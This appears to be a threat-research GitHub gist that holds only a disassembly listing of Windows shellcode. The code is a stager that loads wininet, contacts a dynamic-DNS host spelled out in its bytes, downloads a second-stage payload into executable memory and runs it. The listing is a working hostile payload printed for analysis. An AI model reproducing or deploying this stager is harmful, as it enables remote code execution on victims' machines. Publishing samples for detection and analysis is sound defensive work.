Created
October 6, 2021 07:00
-
-
Save cbresponse/57e4198f5c0dd97a73c29f56f22e3ad6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 00000000 FC CLD | |
| 00000001 E882000000 CALL -FFFFFF78 | |
| 00000006 60 PUSHA | |
| 00000007 89E5 MOV EBP,ESP | |
| 00000009 31C0 XOR EAX,EAX | |
| 0000000B 648B5030 MOV EDX,DWORD PTR FS:[EAX+30] | |
| 0000000F 8B520C MOV EDX,DWORD PTR [EDX+0C] | |
| 00000012 8B5214 MOV EDX,DWORD PTR [EDX+14] | |
| 00000015 8B7228 MOV ESI,DWORD PTR [EDX+28] | |
| 00000018 0FB74A26 MOVZX ECX,WORD PTR [EDX+26] | |
| 0000001C 31FF XOR EDI,EDI | |
| 0000001E AC LODS AL,BYTE PTR [ESI] | |
| 0000001F 3C61 CMP AL,61 | |
| 00000021 7C02 JL 00000025 | |
| 00000023 2C20 SUB AL,20 | |
| 00000025 C1CF0D ROR EDI,0D | |
| 00000028 01C7 ADD EDI,EAX | |
| 0000002A E2F2 LOOP 0000001E | |
| 0000002C 52 PUSH EDX | |
| 0000002D 57 PUSH EDI | |
| 0000002E 8B5210 MOV EDX,DWORD PTR [EDX+10] | |
| 00000031 8B4A3C MOV ECX,DWORD PTR [EDX+3C] | |
| 00000034 8B4C1178 MOV ECX,DWORD PTR [ECX+EDX+78] | |
| 00000038 E348 JRCXZ 00000082 | |
| 0000003A 01D1 ADD ECX,EDX | |
| 0000003C 51 PUSH ECX | |
| 0000003D 8B5920 MOV EBX,DWORD PTR [ECX+20] | |
| 00000040 01D3 ADD EBX,EDX | |
| 00000042 8B4918 MOV ECX,DWORD PTR [ECX+18] | |
| 00000045 E33A JRCXZ 00000081 | |
| 00000047 49 DEC ECX | |
| 00000048 8B348B MOV ESI,DWORD PTR [EBX+ECX*4] | |
| 0000004B 01D6 ADD ESI,EDX | |
| 0000004D 31FF XOR EDI,EDI | |
| 0000004F AC LODS AL,BYTE PTR [ESI] | |
| 00000050 C1CF0D ROR EDI,0D | |
| 00000053 01C7 ADD EDI,EAX | |
| 00000055 38E0 CMP AL,AH | |
| 00000057 75F6 JNE 0000004F | |
| 00000059 037DF8 ADD EDI,DWORD PTR [EBP-08] | |
| 0000005C 3B7D24 CMP EDI,DWORD PTR [EBP+24] | |
| 0000005F 75E4 JNE 00000045 | |
| 00000061 58 POP EAX | |
| 00000062 8B5824 MOV EBX,DWORD PTR [EAX+24] | |
| 00000065 01D3 ADD EBX,EDX | |
| 00000067 668B0C4B MOV CX,WORD PTR [EBX+ECX*2] | |
| 0000006B 8B581C MOV EBX,DWORD PTR [EAX+1C] | |
| 0000006E 01D3 ADD EBX,EDX | |
| 00000070 8B048B MOV EAX,DWORD PTR [EBX+ECX*4] | |
| 00000073 01D0 ADD EAX,EDX | |
| 00000075 89442424 MOV DWORD PTR [ESP+24],EAX | |
| 00000079 5B POP EBX | |
| 0000007A 5B POP EBX | |
| 0000007B 61 POPA | |
| 0000007C 59 POP ECX | |
| 0000007D 5A POP EDX | |
| 0000007E 51 PUSH ECX | |
| 0000007F FFE0 JMP EAX | |
| 00000081 5F POP EDI | |
| 00000082 5F POP EDI | |
| 00000083 5A POP EDX | |
| 00000084 8B12 MOV EDX,DWORD PTR [EDX] | |
| 00000086 EB8D JMP 00000015 | |
| 00000088 5D POP EBP | |
| 00000089 686E657400 PUSH 0074656E | |
| 0000008E 6877696E69 PUSH 696E6977 | |
| 00000093 54 PUSH ESP | |
| 00000094 684C772607 PUSH 0726774C | |
| 00000099 FFD5 CALL EBP | |
| 0000009B 31DB XOR EBX,EBX | |
| 0000009D 53 PUSH EBX | |
| 0000009E 53 PUSH EBX | |
| 0000009F 53 PUSH EBX | |
| 000000A0 53 PUSH EBX | |
| 000000A1 53 PUSH EBX | |
| 000000A2 683A5679A7 PUSH A779563A | |
| 000000A7 FFD5 CALL EBP | |
| 000000A9 53 PUSH EBX | |
| 000000AA 53 PUSH EBX | |
| 000000AB 6A03 PUSH 00000003 | |
| 000000AD 53 PUSH EBX | |
| 000000AE 53 PUSH EBX | |
| 000000AF 68525A0000 PUSH 00005A52 | |
| 000000B4 E8DD000000 CALL -FFFFFE6A | |
| 000000B9 2F DAS | |
| 000000BA 4C DEC ESP | |
| 000000BB 57 PUSH EDI | |
| 000000BC 624E2D BOUND ECX,QWORD PTR [ESI+2D] | |
| 000000BF 5A POP EDX | |
| 000000C0 7A46 JP 00000108 | |
| 000000C2 53 PUSH EBX | |
| 000000C3 4D DEC EBP | |
| 000000C4 734D JAE 00000113 | |
| 000000C6 59 POP ECX | |
| 000000C7 67316A56 XOR DWORD PTR [BP+SI+56],EBP | |
| 000000CB 674A DEC EDX | |
| 000000CD 6648 DEC AX | |
| 000000CF 674F DEC EDI | |
| 000000D1 4F DEC EDI | |
| 000000D2 657232 JB 00000107 | |
| 000000D5 54 PUSH ESP | |
| 000000D6 62546146 BOUND EDX,QWORD PTR [ECX+46] | |
| 000000DA 37 AAA | |
| 000000DB 55 PUSH EBP | |
| 000000DC 7962 JNS 00000140 | |
| 000000DE 57 PUSH EDI | |
| 000000DF 7058 JO 00000139 | |
| 000000E1 5A POP EDX | |
| 000000E2 5A POP EDX | |
| 000000E3 4E DEC ESI | |
| 000000E4 2D6444556C SUB EAX,6C554464 | |
| 000000E9 64754B JNE 00000137 | |
| 000000EC 52 PUSH EDX | |
| 000000ED 7275 JB 00000164 | |
| 000000EF 7A6E JP 0000015F | |
| 000000F1 3468 XOR AL,68 | |
| 000000F3 41 INC ECX | |
| 000000F4 47 INC EDI | |
| 000000F5 58 POP EAX | |
| 000000F6 7548 JNE 00000140 | |
| 000000F8 6F OUTS DX,DWORD PTR [ESI] | |
| 000000F9 6535356F4850 XOR EAX,50486F35 | |
| 000000FF 7738 JA 00000139 | |
| 00000101 44 INC ESP | |
| 00000102 69547A6261635733 IMUL EDX,DWORD PTR [EDX+EDI*2+62],33576361 | |
| 0000010A 55 PUSH EBP | |
| 0000010B 2D655A6A62 SUB EAX,626A5A65 | |
| 00000110 6863005068 PUSH 68500063 | |
| 00000115 57 PUSH EDI | |
| 00000116 899FC6FFD589 MOV DWORD PTR [EDI-762A003A],EBX | |
| 0000011C C6 ??? | |
| 0000011D 53 PUSH EBX | |
| 0000011E 680032E084 PUSH 84E03200 | |
| 00000123 53 PUSH EBX | |
| 00000124 53 PUSH EBX | |
| 00000125 53 PUSH EBX | |
| 00000126 57 PUSH EDI | |
| 00000127 53 PUSH EBX | |
| 00000128 56 PUSH ESI | |
| 00000129 68EB552E3B PUSH 3B2E55EB | |
| 0000012E FFD5 CALL EBP | |
| 00000130 96 XCHG EAX,ESI | |
| 00000131 6A0A PUSH 0000000A | |
| 00000133 5F POP EDI | |
| 00000134 6880330000 PUSH 00003380 | |
| 00000139 89E0 MOV EAX,ESP | |
| 0000013B 6A04 PUSH 00000004 | |
| 0000013D 50 PUSH EAX | |
| 0000013E 6A1F PUSH 0000001F | |
| 00000140 56 PUSH ESI | |
| 00000141 6875469E86 PUSH 869E4675 | |
| 00000146 FFD5 CALL EBP | |
| 00000148 53 PUSH EBX | |
| 00000149 53 PUSH EBX | |
| 0000014A 53 PUSH EBX | |
| 0000014B 53 PUSH EBX | |
| 0000014C 56 PUSH ESI | |
| 0000014D 682D06187B PUSH 7B18062D | |
| 00000152 FFD5 CALL EBP | |
| 00000154 85C0 TEST EAX,EAX | |
| 00000156 7508 JNE 00000160 | |
| 00000158 4F DEC EDI | |
| 00000159 75D9 JNE 00000134 | |
| 0000015B E852000000 CALL -FFFFFE4E | |
| 00000160 6A40 PUSH 00000040 | |
| 00000162 6800100000 PUSH 00001000 | |
| 00000167 6800004000 PUSH 00400000 | |
| 0000016C 53 PUSH EBX | |
| 0000016D 6858A453E5 PUSH E553A458 | |
| 00000172 FFD5 CALL EBP | |
| 00000174 93 XCHG EAX,EBX | |
| 00000175 53 PUSH EBX | |
| 00000176 53 PUSH EBX | |
| 00000177 89E7 MOV EDI,ESP | |
| 00000179 57 PUSH EDI | |
| 0000017A 6800200000 PUSH 00002000 | |
| 0000017F 53 PUSH EBX | |
| 00000180 56 PUSH ESI | |
| 00000181 68129689E2 PUSH E2899612 | |
| 00000186 FFD5 CALL EBP | |
| 00000188 85C0 TEST EAX,EAX | |
| 0000018A 74CF JE 0000015B | |
| 0000018C 8B07 MOV EAX,DWORD PTR [EDI] | |
| 0000018E 01C3 ADD EBX,EAX | |
| 00000190 85C0 TEST EAX,EAX | |
| 00000192 75E5 JNE 00000179 | |
| 00000194 58 POP EAX | |
| 00000195 C3 RET | |
| 00000196 5F POP EDI | |
| 00000197 E877FFFFFF CALL 00000113 | |
| 0000019C 7961 JNS 000001FF | |
| 0000019E 626164 BOUND ESP,QWORD PTR [ECX+64] | |
| 000001A1 61 POPA | |
| 000001A2 626131 BOUND ESP,QWORD PTR [ECX+31] | |
| 000001A5 3131 XOR DWORD PTR [ECX],ESI | |
| 000001A7 2E686F70746F PUSH 6F74706F | |
| 000001AD 2E6F OUTS DX,DWORD PTR CS:[ESI] | |
| 000001AF 7267 JB 00000218 | |
| 000001B1 00BBF0B5A256 ADD BYTE PTR [EBX+56A2B5F0],BH | |
| 000001B7 6A00 PUSH 00000000 | |
| 000001B9 53 PUSH EBX | |
| 000001BA FFD5 CALL EBP |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment